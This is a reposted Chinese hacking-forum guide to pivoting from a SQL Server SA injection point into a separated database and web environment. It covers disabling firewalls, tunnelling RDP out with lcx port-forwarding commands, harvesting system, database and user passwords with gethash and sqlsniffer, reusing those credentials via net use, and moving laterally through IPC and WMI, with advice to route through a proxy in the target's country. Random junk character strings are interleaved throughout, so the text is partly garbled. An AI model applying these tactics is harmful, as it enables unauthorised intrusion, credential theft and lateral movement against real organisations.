当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
. |/ i5 N/ U( K- D1 ]0 P; X7 C7 p3 Z5 q, [ e
. u6 N4 S9 s" a/ z4 d6 c7 V5 F
& u: f. R- ]' q, E' ^( \. dSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)" X/ p$ F' E" n% v4 d# [
6 X' G/ ]# @4 d3 R
( F( }- h! L* s0 d, q) A' \% E' W
一、DB机有公网IP.! C( w2 W) i0 D7 w% r1 G. \
+ v9 p" G3 y( [: m2 {
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
4 Q( Q' d8 r! S9 Q" A; v% z6 E- x5 Z W+ B' h
9 ~) k, H3 e! H4 B+ Z, n- u
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.& \* s' H3 z' m8 f% A7 V
* i7 y9 q8 X( r5 S, F# ^
% O1 Y, z$ [. J2 b/ s& s: F3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com, m, p" e. V+ r% ]& N7 ?6 K
, X$ A, S, g6 s
% L1 H9 H! o$ \5 k$ `4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
. N5 v( y5 I A9 Y- `- c
" Y. L* L1 j1 s5 c: M5 l: h+ b" ~# A$ v% P$ n ^) C9 j4 D' i
- O4 ~! k; `5 y$ m二、DB机只有内网IP
& B y( a/ I8 }! J- i8 q8 u( ~
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.( V7 c5 D% }# J
+ K# L k! G( P6 x+ J
$ L$ H3 J) h$ `& F' E2 ]2:停掉防火墙和IP策略再从内往外扫描.+ Z# G; d0 j( ]$ Z. q6 U
& T8 S8 C) {5 d7 J6 s6 M* S; j
- g T/ R5 Q" J) ~4 y) D( `' T- Y) i* F3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
) Z9 h7 h/ W3 y/ q
5 C. J- ^1 F D; I8 t6 x+ ] m
" f: Z& O5 R! v! J" a+ A; T4:学会密码规律分析往往会有惊喜.3 r% {9 g3 k/ B( w. S
& {* ^2 v5 K7 W% \4 w* B' @
& v; U3 {" e4 v3 u2 X5 m
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等2 N3 L, N, ]% K# S7 m, f2 ]: `
( U, l% R' p4 Z- w8 c. m! Z
) e' ?- \5 y+ }6 a9 X0 o- q有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |